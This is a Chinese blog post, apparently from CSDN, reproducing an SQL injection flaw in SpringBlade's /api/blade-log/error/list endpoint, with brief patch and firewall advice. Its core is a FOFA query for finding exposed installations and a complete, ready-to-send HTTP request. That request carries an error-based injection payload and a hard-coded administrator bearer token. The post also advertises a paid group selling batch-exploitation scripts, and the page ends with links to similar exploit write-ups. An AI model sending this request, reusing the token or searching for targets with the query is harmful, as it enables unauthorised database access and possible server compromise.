SpringBlade error/list SQL 注入漏洞复现

最新推荐文章于 2024-04-22 18:13:56 发布
最新推荐文章于 2024-04-22 18:13:56 发布
阅读量674 收藏 2
点赞数 14
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39894062/article/details/137384615
版权

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。

0x03 漏洞威胁

SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x04 漏洞环境

FOFA:

body="https://bladex.vip"

0x05 漏洞复现

POC

GET /api/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

利用报错注入查询数据库版本

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

⼚商已发布了漏洞修复程序,请及时关注更新:https://github.com/chillzhuang/blade-tool

通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。

如⾮必要,禁⽌公⽹访问该系统。

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等

鲨鱼辣椒丶D
关注
  • 14
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现】(1day)Bladex快速开发平台sql注入漏洞
weixin_56297026的博客
12-20 1068
fofa语法:body="https://bladex.vip/"
漏洞复现SpringBlade tenant/list SQL 注入漏洞
最新发布
siu~
06-03 487
SpringBlade 后台框架 /api/blade-system/tenantist路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
网络安全Spring框架漏洞总结(一)
2201_75857562的博客
01-13 262
Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。
漏洞复现SpringBlade error_list SQL 注入漏洞
https://blog.echo234.cn/
03-26 495
SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。框架后台/api/blade-log/error/list路径存在安全漏洞,攻击者利用该漏洞进行SQL注入攻击。
sql注入详解
m0_67392811的博客
06-12 5768
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql server中错误日志errorlog的深入讲解
12-16
SQL Server 将某些系统事件和用户定义事件记录到 SQL Server 错误日志和 Microsoft Windows 应用程序日志中。 这两种日志都会自动给所有记录事件加上时间戳。 使用 SQL Server 错误日志中的信息可以解决SQL Server的...
asp 防止SQL注入代码
01-20
把下面代码复制到每个文件头部就可以防止SQL注入了,写程序安全最重要 :) <% Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx ‘—定义部份 头—— Fy_Cl = 1 ‘处理方式:1=提示信息,2=转向页面,3=...
SQL Server 2008 R2:error 26 开启远程连接详解
01-01
(provider: SQL Network Interfaces, error: 26 – 定位指定的服务器/实例时出错)–>  因为sql server 2008默认是不允许远程连接的,sa帐户也是默认禁用的,如果想要在本地用SSMS(SQL Server Management St
Oracle PL/SQL中异常高级特性示例解析
09-09
在Oracle的PL/SQL编程中,异常处理是一个关键特性,它允许开发者优雅地处理程序运行时可能出现的问题。本文将深入探讨PL/SQL的三种高级异常处理特性,旨在弥补Oracle内置异常的不足,以满足实际开发中的复杂需求。 ...
Oracle教程之pl/sql简介
09-10
Oracle PL/SQL是一种在Oracle数据库环境中使用的编程语言,它是SQL的增强版本,融合了过程化编程元素。PL/SQL提供了一种结构化的编程环境,允许开发者编写复杂的数据库应用程序,包括存储过程、函数和触发器等。 一...
SpringBlade export-user SQL 注入漏洞复现
0xSec
12-19 1635
SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
复现SpringBlade SQL 注入漏洞_22
fushuang333的博客
01-18 2251
复现SpringBlade SQL 注入漏洞SpringBlade 是由一个商业级项目升级优化而来的SpringCloud微服务架构,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。
漏洞复现-SpringBlade export-user SQL 注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-21 933
漏洞复现-SpringBlade export-user SQL 注入漏洞,附带自己写的poc脚本
SpringBoot 接口报错该如何解决?
Itmastergo的博客
03-05 1265
Spring Boot应用中,接口报错可能由多种原因引起,包括但不限于业务逻辑错误、异常处理不当、依赖库问题、配置错误等。解决接口报错的过程需要分析具体的错误信息、排查可能的原因,并采取相应的调试和修复措施。
微服务架构SpringBlade其api接口存在2处SQL注入
qq_39342001的博客
03-19 454
SpringBlade 是一个由商业级项目升级优化而来的微服务架构,采用 Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。任何人在使用本文文中的信息时,应自行承担全部责任,并确保其符合所有相关法律和规定。本文中提及的所有技术和工具,都应在合法和道德的范围内使用。作者不鼓励或支持任何非法或不道德的行为,包括但不限于侵犯版权、侵犯隐私或违反任何其他法律。如果文档中包含任何第三方版权材料,版权归原作者所有,如有侵权,请联系作者进行处理。
漏洞复现SpringBlade dict-biz SQL注入漏洞
qq_67810151的博客
04-22 421
SpringBlade dict-biz接口存在SQL注入漏洞。未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
编写一个能够验证dvwasql注入漏洞的poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值